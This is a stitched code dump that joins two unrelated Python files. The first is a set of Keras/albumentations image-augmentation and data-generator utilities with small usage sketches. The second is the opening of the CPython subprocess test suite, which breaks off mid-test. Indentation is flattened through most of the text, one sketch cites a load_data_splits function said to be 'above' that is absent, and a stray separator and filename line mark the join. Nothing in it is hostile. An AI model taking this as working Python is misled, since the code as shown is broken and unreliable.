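# mean/std values below are illustrative placeholders, not dataset-specific numbers.
def _preprocess_batch_example():
    ims = [np.zeros((224, 224, 3), dtype=np.uint8) for _ in range(2)]
    batch = preprocess_batch(ims, mean_RGB=[123.7, 116.3, 103.5],
                             std_RGB=[58.4, 57.1, 57.4], mode='tf')
    return batch.shape  # (2, 224, 224, 3), dtype float32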
def augment(im, params=None):
"""
Perform data augmentation on some image using the albumentations package.
Parameters
----------
im : Numpy array
params : dict or None
Contains the data augmentation parameters
Mandatory keys:
            - h_flip ([0,1] float): probability of performing a horizontal left-right mirroring.
            - v_flip ([0,1] float): probability of performing a vertical up-down mirroring.
- rot ([0,1] float): probability of performing a rotation to the image.
- rot_lim (int): max degrees of rotation.
- stretch ([0,1] float): probability of randomly stretching an image.
- crop ([0,1] float): randomly take an image crop.
- zoom ([0,1] float): random zoom applied to crop_size.
--> Therefore the effective crop size at each iteration will be a
random number between 1 and crop*(1-zoom). For example:
* crop=1, zoom=0: no crop of the image
* crop=1, zoom=0.1: random crop of random size between 100% image and 90% of the image
* crop=0.9, zoom=0.1: random crop of random size between 90% image and 80% of the image
* crop=0.9, zoom=0: random crop of always 90% of the image
Image size refers to the size of the shortest side.
- blur ([0,1] float): probability of randomly blurring an image.
- pixel_noise ([0,1] float): probability of randomly adding pixel noise to an image.
- pixel_sat ([0,1] float): probability of randomly using HueSaturationValue in the image.
- cutout ([0,1] float): probability of using cutout in the image.
Returns
-------
Numpy array
"""
## 1) Crop the image
effective_zoom = np.random.rand() * params['zoom']
crop = params['crop'] - effective_zoom
ly, lx, channels = im.shape
crop_size = int(crop * min([ly, lx]))
rand_x = np.random.randint(low=0, high=lx - crop_size + 1)
rand_y = np.random.randint(low=0, high=ly - crop_size + 1)
crop = transforms.Crop(x_min=rand_x,
y_min=rand_y,
x_max=rand_x + crop_size,
y_max=rand_y + crop_size)
im = crop(image=im)['image']
## 2) Now add the transformations for augmenting the image pixels
transform_list = []
# Add random stretching
if params['stretch']:
transform_list.append(
imgaug_transforms.IAAPerspective(scale=0.1, p=params['stretch'])
)
# Add random rotation
if params['rot']:
transform_list.append(
transforms.Rotate(limit=params['rot_lim'], p=params['rot'])
)
# Add horizontal flip
if params['h_flip']:
transform_list.append(
transforms.HorizontalFlip(p=params['h_flip'])
)
# Add vertical flip
if params['v_flip']:
transform_list.append(
transforms.VerticalFlip(p=params['v_flip'])
)
# Add some blur to the image
if params['blur']:
transform_list.append(
albumentations.OneOf([
transforms.MotionBlur(blur_limit=7, p=1.),
transforms.MedianBlur(blur_limit=7, p=1.),
transforms.Blur(blur_limit=7, p=1.),
], p=params['blur'])
)
# Add pixel noise
if params['pixel_noise']:
transform_list.append(
albumentations.OneOf([
transforms.CLAHE(clip_limit=2, p=1.),
imgaug_transforms.IAASharpen(p=1.),
imgaug_transforms.IAAEmboss(p=1.),
transforms.RandomBrightnessContrast(contrast_limit=0, p=1.),
transforms.RandomBrightnessContrast(brightness_limit=0, p=1.),
transforms.RGBShift(p=1.),
transforms.RandomGamma(p=1.)#,
# transforms.JpegCompression(),
# transforms.ChannelShuffle(),
# transforms.ToGray()
], p=params['pixel_noise'])
)
# Add pixel saturation
if params['pixel_sat']:
transform_list.append(
transforms.HueSaturationValue(p=params['pixel_sat'])
)
    # Randomly remove some regions from the image (cutout)
if params['cutout']:
ly, lx, channels = im.shape
scale_low, scale_high = 0.05, 0.25 # min and max size of the squares wrt the full image
scale = np.random.uniform(scale_low, scale_high)
transform_list.append(
transforms.Cutout(num_holes=8, max_h_size=int(scale*ly), max_w_size=int(scale*lx), p=params['cutout'])
)
# Compose all image transformations and augment the image
augmentation_fn = albumentations.Compose(transform_list)
im = augmentation_fn(image=im)['image']
return im
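# Example augmentation-parameter dictionary covering every mandatory key listed in the
# docstring above; the particular probabilities are illustrative only.
def _augment_example(im):
    params = {'h_flip': 0.5, 'v_flip': 0.0, 'rot': 0.3, 'rot_lim': 30,
              'stretch': 0.1, 'crop': 0.9, 'zoom': 0.1, 'blur': 0.1,
              'pixel_noise': 0.1, 'pixel_sat': 0.1, 'cutout': 0.2}
    return augment(im, params=params)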
def resize_im(im, height, width):
resize_fn = transforms.Resize(height=height, width=width)
return resize_fn(image=im)['image']
def data_generator(inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Generator to feed Keras fit function
Parameters
----------
inputs : Numpy array, shape (N, H, W, C)
targets : Numpy array, shape (N)
batch_size : int
shuffle : bool
aug_params : dict
im_size : int
Final image size to feed the net's input (eg. 224 for Resnet).
Returns
-------
Generator of inputs and labels
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
# Create list of indices
idxs = np.arange(len(inputs))
if shuffle:
np.random.shuffle(idxs)
# # Reshape targets to the correct shape
# if len(targets.shape) == 1:
# print('reshaping targets')
# targets = targets.reshape(-1, 1)
for start_idx in range(0, len(inputs) - batch_size + 1, batch_size):
excerpt = idxs[start_idx:start_idx + batch_size]
batch_X = []
for i in excerpt:
im = load_image(inputs[i], filemode='local')
im = augment(im, params=aug_params)
im = resize_im(im, height=im_size, width=im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=mean_RGB, std_RGB=std_RGB, mode=preprocess_mode)
batch_y = to_categorical(targets[excerpt], num_classes=num_classes)
yield batch_X, batch_y
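# Hedged sketch wiring the generator above into Keras; `model`, the data arrays and the
# augmentation parameters are assumed to be defined elsewhere.
def _data_generator_example(model, X, y, aug_params, num_classes):
    gen = data_generator(X, y, batch_size=32,
                         mean_RGB=[123.7, 116.3, 103.5], std_RGB=[58.4, 57.1, 57.4],
                         preprocess_mode='tf', aug_params=aug_params,
                         num_classes=num_classes)
    model.fit(gen, steps_per_epoch=len(X) // 32, epochs=1)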
def buffered_generator(source_gen, buffer_size=10):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
Author: Benanne (github-kaggle/benanne/ndsb)
Parameters
----------
source_gen : generator
buffer_size: the maximal number of items to pre-generate (length of the buffer)
Returns
-------
Buffered generator
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
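# Small illustration of the buffered generator above; the slow source below is a
# stand-in for an expensive data pipeline.
def _buffered_generator_example():
    import time
    def slow_source():
        for i in range(5):
            time.sleep(0.1)  # simulate slow generation
            yield i
    return list(buffered_generator(slow_source(), buffer_size=3))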
class data_sequence(Sequence):
"""
    Subclass of a Keras Sequence that is safer to use with multiprocessing than a standard generator.
Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly
TODO: Add sample weights on request
"""
def __init__(self, inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Parameters are the same as in the data_generator function
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
self.inputs = inputs
self.targets = targets
self.batch_size = batch_size
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.num_classes = num_classes
self.im_size = im_size
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.inputs) / float(self.batch_size)))
def __getitem__(self, idx):
batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
batch_X = []
tmp_idxs = []
for i in batch_idxs:
try:
im = load_image(self.inputs[i])
except Exception as e:
print(e)
continue
if self.aug_params:
im = augment(im, params=self.aug_params)
im = resize_im(im, height=self.im_size, width=self.im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
tmp_idxs.append(i)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
batch_y = to_categorical(self.targets[tmp_idxs], num_classes=self.num_classes)
return batch_X, batch_y
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.inputs))
if self.shuffle:
np.random.shuffle(self.indexes)
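# Hedged sketch: the Sequence above can be passed straight to model.fit with worker
# processes; `model`, the data arrays and aug_params are assumed to exist elsewhere.
def _data_sequence_example(model, X, y, aug_params, num_classes):
    seq = data_sequence(X, y, batch_size=32,
                        mean_RGB=[123.7, 116.3, 103.5], std_RGB=[58.4, 57.1, 57.4],
                        preprocess_mode='tf', aug_params=aug_params,
                        num_classes=num_classes)
    model.fit(seq, epochs=1, workers=4, use_multiprocessing=True)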
def standard_tencrop_batch(im, crop_prop=0.9):
"""
Returns an ordered ten crop batch of images from an original image (corners, center + mirrors).
Parameters
----------
im : numpy array, type np.uint8
crop_prop: float, [0, 1]
Size of the crop with respect to the whole image
Returns
-------
List of 10 numpy arrays
"""
batch = []
min_side = np.amin(im.shape[:2])
im = resize_im(im, height=min_side, width=min_side) # resize to shorter border
h, w = min_side, min_side # height, width (square)
crop_size = int(crop_prop * min_side)
# Crops
c1 = transforms.Crop(x_min=0,
y_min=0,
x_max=crop_size,
y_max=crop_size)(image=im)['image'] # top-left
c2 = transforms.Crop(x_min=0,
y_min=h-crop_size,
x_max=crop_size,
y_max=h)(image=im)['image'] # bottom-left
c3 = transforms.Crop(x_min=w-crop_size,
y_min=0,
x_max=w,
y_max=crop_size)(image=im)['image'] # top-right
c4 = transforms.Crop(x_min=w-crop_size,
y_min=h-crop_size,
x_max=w,
y_max=h)(image=im)['image'] # bottom-right
c5 = transforms.Crop(x_min=np.round((w-crop_size)/2).astype(int),
y_min=np.round((h-crop_size)/2).astype(int),
x_max=np.round((w+crop_size)/2).astype(int),
y_max=np.round((h+crop_size)/2).astype(int))(image=im)['image'] # center
# Save crop and its mirror
lr_aug = albumentations.HorizontalFlip(p=1)
for image in [c1, c2, c3, c4, c5]:
batch.append(image)
batch.append(lr_aug(image=image)['image'])
return batch
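# Sketch of the usual test-time use of the ten-crop batch above: predictions over the
# crops are averaged; `model` and the RGB statistics are assumed to exist elsewhere.
def _tencrop_predict_example(model, im, mean_RGB, std_RGB):
    crops = standard_tencrop_batch(im, crop_prop=0.9)
    crops = [resize_im(c, height=224, width=224) for c in crops]
    batch = preprocess_batch(crops, mean_RGB=mean_RGB, std_RGB=std_RGB, mode='tf')
    preds = model.predict(batch)  # shape (10, num_classes)
    return preds.mean(axis=0)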
class k_crop_data_sequence(Sequence):
"""
Data sequence generator for test time to feed to predict_generator.
Each batch delivered is composed by multiple crops (default=10) of the same image.
"""
def __init__(self, inputs, mean_RGB, std_RGB, preprocess_mode, aug_params, crop_number=10, crop_mode='random',
filemode='local', im_size=224):
"""
Parameters are the same as in the data_generator function except for:
Parameters
----------
crop_number : int
Number of crops of each image to take.
        crop_mode : str, {'random', 'standard'}
            If 'random', data augmentation is performed randomly on each crop.
            If 'standard', we take the standard 10 crops (corners + center + mirrors).
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
"""
self.inputs = inputs
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.crop_number = crop_number
self.crop_mode = crop_mode
self.filemode = filemode
self.im_size = im_size
def __len__(self):
return len(self.inputs)
def __getitem__(self, idx):
batch_X = []
im = load_image(self.inputs[idx], filemode=self.filemode)
if self.crop_mode == 'random':
for _ in range(self.crop_number):
if self.aug_params:
im_aug = augment(im, params=self.aug_params)
else:
im_aug = np.copy(im)
im_aug = resize_im(im_aug, height=self.im_size, width=self.im_size)
batch_X.append(im_aug) # shape (N, 224, 224, 3)
if self.crop_mode == 'standard':
batch_X = standard_tencrop_batch(im)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
return batch_X
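# Hedged test-time sketch: average the predictions over several random crops of each
# image; `model` and the list of image paths are assumed to exist elsewhere.
def _k_crop_predict_example(model, image_paths, aug_params):
    seq = k_crop_data_sequence(image_paths,
                               mean_RGB=[123.7, 116.3, 103.5], std_RGB=[58.4, 57.1, 57.4],
                               preprocess_mode='tf', aug_params=aug_params,
                               crop_number=10, crop_mode='random', filemode='local')
    preds = model.predict(seq)  # shape (len(image_paths) * 10, num_classes)
    return preds.reshape(len(image_paths), 10, -1).mean(axis=1)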
def im_stats(filename):
"""
Helper for function compute_meanRGB
"""
im = load_image(filename, filemode='local')
mean = np.mean(im, axis=(0, 1))
std = np.std(im, axis=(0, 1))
return mean.tolist(), std.tolist()
def compute_meanRGB(im_list, verbose=False, workers=4):
"""
Returns the mean and std RGB values for the whole dataset.
For example in the plantnet dataset we have:
mean_RGB = np.array([ 107.59348955, 112.1047813 , 80.9982362 ])
std_RGB = np.array([ 52.78326119, 50.56163087, 50.86486131])
Parameters
----------
im_list : array of strings
Array where the first column is image_path (or image_url). Shape (N,).
verbose : bool
Show progress bar
workers: int
Numbers of parallel workers to perform the computation with.
References
----------
https://stackoverflow.com/questions/41920124/multiprocessing-use-tqdm-to-display-a-progress-bar
"""
print('Computing mean RGB pixel with {} workers...'.format(workers))
with Pool(workers) as p:
r = list(tqdm(p.imap(im_stats, im_list),
total=len(im_list),
                      disable=not verbose))
r = np.asarray(r)
mean, std = r[:, 0], r[:, 1]
mean, std = np.mean(mean, axis=0), np.mean(std, axis=0)
print('Mean RGB pixel: {}'.format(mean.tolist()))
print('Standard deviation of RGB pixel: {}'.format(std.tolist()))
return mean.tolist(), std.tolist()
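# Hedged usage sketch: compute the dataset RGB statistics from the training split; the
# directories are assumed to be laid out as expected by load_data_splits above.
def _compute_meanRGB_example(splits_dir, im_dir):
    X, _ = load_data_splits(splits_dir, im_dir, split_name='train')
    return compute_meanRGB(X, verbose=True, workers=4)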
def compute_classweights(labels, max_dim=None, mode='balanced'):
"""
Compute the class weights for a set of labels to account for label imbalance.
Parameters
----------
labels : numpy array, type (ints), shape (N)
max_dim : int
Maximum number of classes. Default is the max value in labels.
mode : str, {'balanced', 'log'}
Returns
-------
Numpy array, type (float32), shape (N)
"""
if mode is None:
return None
weights = np.bincount(labels)
weights = np.sum(weights) / weights
# Fill the count if some high number labels are not present in the sample
if max_dim is not None:
diff = max_dim - len(weights)
if diff != 0:
weights = np.pad(weights, pad_width=(0, diff), mode='constant', constant_values=0)
# Transform according to different modes
if mode == 'balanced':
pass
elif mode == 'log':
# do not use --> produces numerical instabilities at inference when transferring weights trained on GPU to CPU
weights = np.log(weights) # + 1
else:
raise ValueError('{} is not a valid option for parameter "mode"'.format(mode))
return weights.astype(np.float32)
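# Worked example of the class-weight computation above: with labels [0, 0, 0, 1] the
# counts are [3, 1], so the 'balanced' weights are [4/3, 4].
def _compute_classweights_example():
    labels = np.array([0, 0, 0, 1])
    return compute_classweights(labels, mode='balanced')  # ~[1.33, 4.0]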
def json_friendly(d):
"""
Return a json friendly dictionary (mainly remove numpy data types)
"""
new_d = {}
for k, v in d.items():
if isinstance(v, (np.float32, np.float64)):
v = float(v)
elif isinstance(v, (np.ndarray, list)):
if isinstance(v[0], (np.float32, np.float64)):
v = np.array(v).astype(float).tolist()
else:
v = np.array(v).tolist()
new_d[k] = v
return new_d
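# Quick illustration of the numpy-to-JSON cleanup above.
def _json_friendly_example():
    d = {'accuracy': np.float32(0.91), 'probs': np.array([0.1, 0.9], dtype=np.float32)}
    return json_friendly(d)  # {'accuracy': 0.91..., 'probs': [0.1..., 0.9...]}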
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import warnings_helper
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
from test.support.os_helper import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
try:
import fcntl
except ImportError:
fcntl = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with os_helper.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
